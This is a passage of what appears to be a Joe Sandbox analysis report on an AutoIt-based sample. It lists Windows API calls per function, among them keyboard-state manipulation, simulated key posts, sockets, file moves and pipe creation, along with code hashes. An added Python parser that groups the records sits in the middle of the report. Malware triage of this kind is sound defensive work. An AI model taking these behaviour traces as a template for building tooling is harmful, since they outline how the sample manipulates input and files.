  • Part of subcall function 00140CDF: VariantInit.OLEAUT32(00000000), ref: 00140D1F
  • Part of subcall function 00140CDF: VariantCopy.OLEAUT32(?,?), ref: 00140D28
  • Part of subcall function 00140CDF: VariantClear.OLEAUT32(?), ref: 00140D34
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4137639002-1221869570
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0013000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?,?,0013035E), ref: 0013002B
  • Part of subcall function 0013000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?), ref: 00130046
  • Part of subcall function 0013000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?), ref: 00130054
  • Part of subcall function 0013000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?), ref: 00130064
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00154C51
• _wcslen.LIBCMT ref: 00154D59
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00154DCF
• CoTaskMemFree.OLE32(?), ref: 00154DDA
Strings
Similarity
• API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 614568839-2785691316
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetMenu.USER32(?), ref: 00162183
• GetMenuItemCount.USER32(00000000), ref: 001621B5
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001621DD
• _wcslen.LIBCMT ref: 00162213
• GetMenuItemID.USER32(?,?), ref: 0016224D
• GetSubMenu.USER32(?,?), ref: 0016225B
  • Part of subcall function 00133A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00133A57
  • Part of subcall function 00133A3D: GetCurrentThreadId.KERNEL32 ref: 00133A5E
  • Part of subcall function 00133A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001325B3), ref: 00133A65
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001622E3
  • Part of subcall function 0013E97B: Sleep.KERNEL32 ref: 0013E9F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4196846111-0
                                                                                                                                                                                                                                          • Opcode ID: fad3a60d2a292376504dbcb600e0722ffc372aca713aded30886cd177b44d428
                                                                                                                                                                                                                                          • Instruction ID: 49200f1a470b44e20c86dd78210aefe1888ee0651df7dd60278c003e8ba939e4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fad3a60d2a292376504dbcb600e0722ffc372aca713aded30886cd177b44d428
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5718D75A00605AFCB14DFA8CC45AAEB7F1EF48310F158469E816EB341DB74AE418BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• IsWindow.USER32(010955B8), ref: 00167F37
• IsWindowEnabled.USER32(010955B8), ref: 00167F43
• SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0016801E
• SendMessageW.USER32(010955B8,000000B0,?,?), ref: 00168051
• IsDlgButtonChecked.USER32(?,?), ref: 00168089
• GetWindowLongW.USER32(010955B8,000000EC), ref: 001680AB
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001680C3
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: 0ad1cea005e095574e5b962b966af7e531345cf96bcf53029552236cbf81243b
• Instruction ID: d53cc734b812db1d58b82c8537cee491f081d34dc0dcd6ff3065eb523c2cb602
• Opcode Fuzzy Hash: 0ad1cea005e095574e5b962b966af7e531345cf96bcf53029552236cbf81243b
• Instruction Fuzzy Hash: EE71B034608204AFEF219F64CC84FFABBB5EF1A304F144499F965972A1CB71AC64CB60
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetParent.USER32(?), ref: 0013AEF9
• GetKeyboardState.USER32(?), ref: 0013AF0E
• SetKeyboardState.USER32(?), ref: 0013AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 0013AF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0013AFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 0013AFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 0013B020
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: ac7b2bc8e8e88857bd4a1bb1db960db95a9944dd7c39484299fb881b5ff8972a
• Instruction ID: b4a6db2d87f9b562e4401d5a9b4d1ae4eafa8483e9312142ee43c1ce09a11844
• Opcode Fuzzy Hash: ac7b2bc8e8e88857bd4a1bb1db960db95a9944dd7c39484299fb881b5ff8972a
• Instruction Fuzzy Hash: 245192A06087D53DFB364234CC85BBBBEA95F06304F088589F2D9998D2D3D9ACC8D751
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetParent.USER32(00000000), ref: 0013AD19
• GetKeyboardState.USER32(?), ref: 0013AD2E
• SetKeyboardState.USER32(?), ref: 0013AD8F
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0013ADBB
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0013ADD8
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0013AE17
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0013AE38
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 2340b83fed55d180799786e310cee05ec8388a57dbdfba911f92d5d65cbbcb75
• Instruction ID: fca950b2d1f269bc475a68125b4b9d1b50d5b4705de027375da3f25b37f36756
• Opcode Fuzzy Hash: 2340b83fed55d180799786e310cee05ec8388a57dbdfba911f92d5d65cbbcb75
• Instruction Fuzzy Hash: DF5118A16487D53DFB378374CC95BBABEA85F46300F488598E1D54A8C3D394EC88D762
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(00113CD6,?,?,?,?,?,?,?,?,00105BA3,?,?,00113CD6,?,?), ref: 00105470
• __fassign.LIBCMT ref: 001054EB
• __fassign.LIBCMT ref: 00105506
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00113CD6,00000005,00000000,00000000), ref: 0010552C
• WriteFile.KERNEL32(?,00113CD6,00000000,00105BA3,00000000,?,?,?,?,?,?,?,?,?,00105BA3,?), ref: 0010554B
• WriteFile.KERNEL32(?,?,00000001,00105BA3,00000000,?,?,?,?,?,?,?,?,?,00105BA3,?), ref: 00105584
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1324828854-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _ValidateLocalCookies.LIBCMT ref: 000F2D4B
• ___except_validate_context_record.LIBVCRUNTIME ref: 000F2D53
• _ValidateLocalCookies.LIBCMT ref: 000F2DE1
• __IsNonwritableInCurrentImage.LIBCMT ref: 000F2E0C
• _ValidateLocalCookies.LIBCMT ref: 000F2E61
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0015304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0015307A
  • Part of subcall function 0015304E: _wcslen.LIBCMT ref: 0015309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00151112
• WSAGetLastError.WSOCK32 ref: 00151121
• WSAGetLastError.WSOCK32 ref: 001511C9
• closesocket.WSOCK32(00000000), ref: 001511F9
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• API String ID: 2675159561-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0013DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0013CF22,?), ref: 0013DDFD
  • Part of subcall function 0013DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0013CF22,?), ref: 0013DE16
• lstrcmpiW.KERNEL32(?,?), ref: 0013CF45
• MoveFileW.KERNEL32(?,?), ref: 0013CF7F
• _wcslen.LIBCMT ref: 0013D005
• _wcslen.LIBCMT ref: 0013D01B
• SHFileOperationW.SHELL32(?), ref: 0013D061
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
• String ID: \*.*
• API String ID: 3164238972-1173974218
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00162E1C
• GetWindowLongW.USER32(?,000000F0), ref: 00162E4F
• GetWindowLongW.USER32(?,000000F0), ref: 00162E84
• SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00162EB6
• SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00162EE0
• GetWindowLongW.USER32(?,000000F0), ref: 00162EF1
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00162F0B
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2178440468-0
                                                                                                                                                                                                                                          • Opcode ID: 6bfaad06e70af410e2d3dee369859b31eeb4da8e5d5d6b1275e1cdb6e2ce914d
                                                                                                                                                                                                                                          • Instruction ID: b352bf1154092950d44a07f64fd6d0601cff034a111b325240eb39863832545a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bfaad06e70af410e2d3dee369859b31eeb4da8e5d5d6b1275e1cdb6e2ce914d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35312230A44650AFEB20CF58DC84FA537E0FB9A710F1501A5F9508F6B2CBB2A8A0DB41
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00137769
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0013778F
• SysAllocString.OLEAUT32(00000000), ref: 00137792
• SysAllocString.OLEAUT32(?), ref: 001377B0
• SysFreeString.OLEAUT32(?), ref: 001377B9
• StringFromGUID2.OLE32(?,?,00000028), ref: 001377DE
• SysAllocString.OLEAUT32(?), ref: 001377EC
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 24d1829a1dd01482142d45ce7c7e70047bcddc367871a84a05813c84a9634ea3
• Instruction ID: bdebcc6de58ddf0d12b79a8a537e4a56fdd29c5155d83c200d851a603f479807
• Opcode Fuzzy Hash: 24d1829a1dd01482142d45ce7c7e70047bcddc367871a84a05813c84a9634ea3
• Instruction Fuzzy Hash: 0D21A776608219AFDF20DFA9CC88CBB77ACEB09764B048425F915DB291D770DC45C7A0
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00137842
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00137868
• SysAllocString.OLEAUT32(00000000), ref: 0013786B
• SysAllocString.OLEAUT32 ref: 0013788C
• SysFreeString.OLEAUT32 ref: 00137895
• StringFromGUID2.OLE32(?,?,00000028), ref: 001378AF
• SysAllocString.OLEAUT32(?), ref: 001378BD
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 640cccbdfafebdf25c6ed84cbf656c7cf3cb9654acb3ef95e9a8a02e32062807
• Instruction ID: 889989a2a803b875520df34afe54b3e663f8f93520dc8b8c1fd27c14dbcbc57c
• Opcode Fuzzy Hash: 640cccbdfafebdf25c6ed84cbf656c7cf3cb9654acb3ef95e9a8a02e32062807
• Instruction Fuzzy Hash: 1D21A471605215AFDF209FA9DC88DBA77ECEB09360B108165F915DB2A1DB70DC81CB64
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStdHandle.KERNEL32(0000000C), ref: 001404F2
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0014052E
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: 189ae099c5387043a0041a88115f1be2d7c818fd4bf88cb277cabb0dbc1b90a4
• Instruction ID: b0d21ee9da08b92cba0cb7efb6f599c54045ecca6e563f3b3aabda02d0d87f4b
• Opcode Fuzzy Hash: 189ae099c5387043a0041a88115f1be2d7c818fd4bf88cb277cabb0dbc1b90a4
• Instruction Fuzzy Hash: 8D2162755003059FDF219F2ADC44A5A77A4FF49764F204A19F9A1DB2F0D7709940CF60
Uniqueness
Uniqueness Score: -1.00%
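The function records in this section are raw call-site listings, and several of them are near-duplicates of each other (the two MultiByteToWideChar/SysAllocString/StringFromGUID2 functions share API String ID 3761583154-0; the two GetStdHandle/CreatePipe functions share 1424370930-2873401336). To use them for triage it helps to parse them into structured data keyed by that similarity ID. The following Python parser is an added example, not code from the Joe Sandbox report or its IDA plugin: it reads records in the layout shown above (a constructed sample trimmed from this section is embedded), groups functions that share an API String ID, and flags the GetStdHandle/CreatePipe/"nul" combination as the stdio plumbing a runtime uses when it spawns a child process. Two assumptions are labelled in the code: that several strings in a "String ID" field are joined with "$" as in the "API ID" field, and that a function's first call-site address can stand in for the function, which the report does not name.

```python
import re
from collections import defaultdict, namedtuple
from dataclasses import dataclass, field

# Constructed sample, trimmed from the function records on this page: each record
# starts with an "APIs" header; its similarity keys follow under "Similarity".
SAMPLE = """\
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00137769
• SysAllocString.OLEAUT32(00000000), ref: 00137792
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00137842
• SysAllocString.OLEAUT32 ref: 0013786B
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 001404F2
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0014052E
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
"""
# "Name.MODULE(args), ref: ADDR"; the argument list is sometimes omitted in the report.
API_RE = re.compile(r"^• (\w+)\.(\w+)(?:\(([^)]*)\))?,? ref: ([0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^• ([^:]+): ?(.*)$")

ApiCall = namedtuple("ApiCall", "name module args ref")


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)   # ApiCall entries in report order
    meta: dict = field(default_factory=dict)    # "API ID", "String ID", hashes, ...

    @property
    def api_string_id(self) -> str:
        return self.meta.get("API String ID", "")

    @property
    def strings(self) -> list:
        # Assumption: several strings are joined with '$', as in the API ID field.
        return [s for s in self.meta.get("String ID", "").split("$") if s]


def parse_records(text: str) -> list:
    """Split report text into FunctionRecords; a new record starts at each 'APIs' header."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):          # bare lines are section headers
            section = line
            if section == "APIs":
                records.append(FunctionRecord())
            continue
        if not records:
            continue
        rec = records[-1]
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                name, module, args, ref = m.groups()
                arglist = tuple(a for a in (args or "").split(",") if a)
                rec.calls.append(ApiCall(name, module, arglist, int(ref, 16)))
        else:
            m = KV_RE.match(line)
            if m:
                rec.meta[m.group(1).strip()] = m.group(2).strip()
    return records


def group_by_signature(records: list) -> dict:
    """Map Joe Sandbox's 'API String ID' to the first call-site address of each function
    sharing it (assumption: that address stands in for the unnamed function)."""
    groups = defaultdict(list)
    for rec in records:
        if rec.calls:
            groups[rec.api_string_id].append(rec.calls[0].ref)
    return dict(groups)


def redirects_child_stdio(rec: FunctionRecord) -> bool:
    """GetStdHandle and CreatePipe beside the string 'nul' is the shape of a runtime
    wiring a child process's standard handles to a pipe or the null device."""
    names = {c.name for c in rec.calls}
    return {"GetStdHandle", "CreatePipe"} <= names and "nul" in rec.strings


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for sig, refs in group_by_signature(recs).items():
        print(sig, [hex(r) for r in refs])
    print([hex(r.calls[0].ref) for r in recs if redirects_child_stdio(r)])
```

The argument values are kept as the opaque strings the report prints (for example the 0000000C and 000000F6 passed to GetStdHandle); they are not decoded into named constants, since the report's rendering of negative and truncated arguments is not documented here. Grouping by API String ID is what lets you read the two GetStdHandle/CreatePipe records as one piece of runtime code reached from two call sites rather than two distinct capabilities.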

APIs
• GetStdHandle.KERNEL32(000000F6), ref: 001405C6
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00140601
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: e85615d25a850a6902fb2d96e029d2153f8d28b19d96baa0cc574bac78509eff
• Instruction ID: 47783680172b02caf423bb28da22b1d1927e4425302a10b32028ce460b5a87eb
• Opcode Fuzzy Hash: e85615d25a850a6902fb2d96e029d2153f8d28b19d96baa0cc574bac78509eff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C2183755003159FDB219F6A8C04A6A77E4BF99720F214A1DFEA2E72F0D7B09860CB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000D604C
  • Part of subcall function 000D600E: GetStockObject.GDI32(00000011), ref: 000D6060
  • Part of subcall function 000D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 000D606A
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00164112
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0016411F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0016412A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00164139
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00164145
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 6a86107896316c37b62c18901f00f14cd47035e748bd8d8b1857b4418cb62fc8
